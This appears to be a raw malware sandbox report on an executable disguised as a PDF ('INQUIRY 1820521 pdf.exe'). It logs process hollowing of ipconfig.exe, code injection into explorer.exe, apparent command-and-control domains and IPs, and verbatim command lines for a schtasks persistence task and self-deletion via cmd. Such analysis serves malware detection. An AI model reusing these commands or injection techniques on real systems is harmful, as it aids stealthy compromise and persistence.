Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032FA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03283D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03279100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03279100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03279100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0329C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0329C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0329B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0329B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03297D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_033405AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_033405AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0329C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03272D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032AA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032AFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032AFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03328DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0327B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0328D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0328D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0333FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0333FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0333FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0333FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_033041E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0328B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0328B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0328B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0328B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032ABC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03344015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03344015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03331C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0334740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0334740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0334740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03332073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03341074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0329746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0330C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_0330C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032AA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_03290050 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\ipconfig.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.hhcuerkn.com
Source: C:\Windows\explorer.exe	Network Connect: 210.152.87.233 80
Source: C:\Windows\explorer.exe	Network Connect: 104.21.82.58 80
Source: C:\Windows\explorer.exe	Domain query: www.xinghai-nb.com
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80
Source: C:\Windows\explorer.exe	Domain query: www.mobcitylabs.com

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Memory written: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 3424

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: B50000

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp'
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Process created: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe'

Source: explorer.exe, 0000000A.00000000.683281450.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000000A.00000002.908224655.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000010.00000002.909559117.00000000046E0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000002.921124945.0000000005E50000.00000004.00000001.sdmp, ipconfig.exe, 00000010.00000002.909559117.00000000046E0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000002.908224655.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000010.00000002.909559117.00000000046E0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000002.908224655.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 00000010.00000002.909559117.00000000046E0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.701814701.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
